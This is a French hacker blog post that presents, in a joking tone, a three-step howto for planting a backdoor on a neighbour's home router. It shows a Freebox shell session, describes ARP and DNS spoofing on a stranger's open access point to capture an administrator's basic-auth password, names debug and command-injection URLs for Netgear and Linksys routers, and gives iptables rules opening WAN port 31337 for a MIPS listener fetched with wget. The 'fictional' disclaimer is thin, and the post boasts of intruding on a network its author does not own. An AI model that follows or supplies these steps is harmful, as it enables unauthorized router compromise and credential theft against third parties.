Divagations mipselliennes

Tiens un sujet qui me tiens à coeur l'embedded :)

Un petit howto en 3 étapes sur comment installer une porte sur le routeur de son voisin (hinhinhin).

Bien entendu il faut clarifier les choses tout ce qui sera écrit ici ne sera que pure imagination, ces informations ne sont évidement pas vraies ( sauf hier j'ai eu les root server du RIPE et les dossier de la NSA sur la zone 51 :p )

Bon pour nos cher amis.

Tout le monde sais ce que l'arp peut faire dans un lan, on a beau mettre des tables arp statiques n'importe quel petit malin peut saturer sa table sam et le rendre inutilisable.
De la repose la grosse faiblesse ethernet, des protocoles qui disent amen à tout.

Maintenant réfléchissons sur une plus grande échelle, sur un portail captif, une livebox, une freebox, un routeur netgear/linksys/peabird j'en passe et des meilleures vous savez ce qu'il y a dedans ? non ? :> bah un simple linux burné en flash.

Prenons la freebox par exemple

# ls -l /sbin
-rwxr-xr-x    1 0        0           14799 start_phone_ipadsl
-rwxr-xr-x    1 0        0           29560 prism2_srec
-rwxr-xr-x    1 0        0           18297 ifstats
-rwxr-xr-x    1 0        0          105097 hostapd
lrwxrwxrwx    1 0        0              18 reboot -> ../bin/busybox_alt
lrwxrwxrwx    1 0        0              18 ifconfig -> ../bin/busybox_alt
-rwxr-xr-x    1 0        0           13304 adjboot
-rwxr-xr-x    1 0        0           49813 freeboxd
-rwxr-xr-x    1 0        0           35906 iwpriv
-rwxr-xr-x    1 0        0           26452 insmod
-rwxr-xr-x    1 0        0           15083 fbxbrctl
-rwxr-xr-x    1 0        0           14076 rand_nbr
-rwxr-xr-x    1 0        0           13331 get_pass
-rwxr-xr-x    1 0        0           16469 fbxdivertctl
-rwxr-xr-x    1 0        0           20395 telnetd
-rwxr-xr-x    1 0        0           14467 generate_hash
-rwxr-xr-x    1 0        0           80768 iptables
lrwxrwxrwx    1 0        0              14 route -> ../bin/busybox
-rwxr-xr-x    1 0        0           15161 rmmod
-rwxr-xr-x    1 0        0           18206 update_bank1
lrwxrwxrwx    1 0        0              16 getty -> ../bin/tinylogin
-rwxr-xr-x    1 0        0           32425 dhcpd
-rwxr-xr-x    1 0        0           22854 brctl
-rwxr-xr-x    1 0        0           38521 iwconfig
-rwxr-xr-x    1 0        0           19565 sntp
-rwxr-xr-x    1 0        0           54849 qosd
-rwxr-xr-x    1 0        0          123044 pppd
-rwxr-xr-x    1 0        0           25675 init
-rwxr-xr-x    1 0        0           65090 tc
# ps -ef
  PID TTY     Uid        Size State Command
    1         root     268192   S   /sbin/init
    2         root          0   S   [keventd]
    3         root          0   S   [ksoftirqd_CPU0]
    4         root          0   S   [kswapd]
    5         root          0   S   [bdflush]
    6         root          0   S   [kupdated]
   41         root     194720   S   /sbin/freeboxd
   45         root     194720   S   /sbin/freeboxd
   50         root     333792   S   /bin/sh
   52         root     272352   R   ps -ef
# quit

Nous voyons qu'effectivement on a un petit shell via busybox nos petits démon le init pour les runlevel qui a l'air de bien se porter et des modules plutot standard.
Pourquoi ne pourrait on pas injecter un petit programme ? ce type d'equipement plutot proche de l'appliance repose surtout sur netfilter, mais on lui demande gentillement de nous ouvrir une porte vers l'extérieur ça serait pas plus mal non ?
Prenons l'exemple du netgear, pas plus tard qu'hier en me baladant j'ai trouvé un petit point d'acces sympas ouvert. En regardant la mac j'ai pu définir la marque ( bouh le vilain il connait pas hw ether ).
On teste les pass par défaut et ça ne fonctionne pas :(
Tanpis, on peut voir du traffic sur la borne il suffit de foutre en l'air les dns (encore une cassdédi à mon pote arp) et d'attendre que quelqu'un se connecte sur le routeur pour voir ce qu'il se passe et moi de récuperer le graal du auth basic base64.

A ton avis j'ai fait quoi ? :)

Il m'a fallut quand même attendre 2 bieres pour que l'admin veuille bien pointer le bout de son nez.
Et la c'est le drame ... admin / p455w0rd enfin passons d'ailleur Monsieur l'administrateur si tu passes par la, même si ton pass était ugly au moin ça t'a protégé.

Donc acces au panel d'administration c'est cool ! ça va pas me payer mes vacances, mais surtout je peux utiliser les techniques de sioux (pour les netgear http://192.168.x.x/setup.cgi?todo=debug pour les linksys ping.asp pour les autres google)

Bon maintenant on passe aux choses sérieuses le TELNET.

The last one
ça tiens en 3 lignes (à ton avis y'a quoi à la place de $wan ?)

iptables -t nat -A PREROUTING -i $wan -p tcp --dport 31337 -j ACCEPT
iptables        -A INPUT      -i $wan -p tcp --dport 31337 -j ACCEPT
./bibir0x0r

avec notre cher bibir0x0r cross compilé mips qui écoute sur port 31337 ( bon y'a carrément moin voyant comme solution mais comme le garçon de café regarde d'un drole d'oeil ==> on fait avec les moyens du bord et en speed )

Tiens d'ailleur ce fameux bibir0x0r comment il est arrivé la ? tu crois que dans les firmwares de routeur tu as wget toi ? bah dans ce cas oui :D

Mais si il était pas la ? bah facile ici et ici

Aprés à toi le monde des routeurs rootés mais surtout du petit monde ethernet derriere la porte internet ( fear )

Bien entendu toute cette histoire est fictive toute ressemblance avec l'histoire d'un admin de Versaille rive gauche à coté du café de la gare n'est que pure coincidence.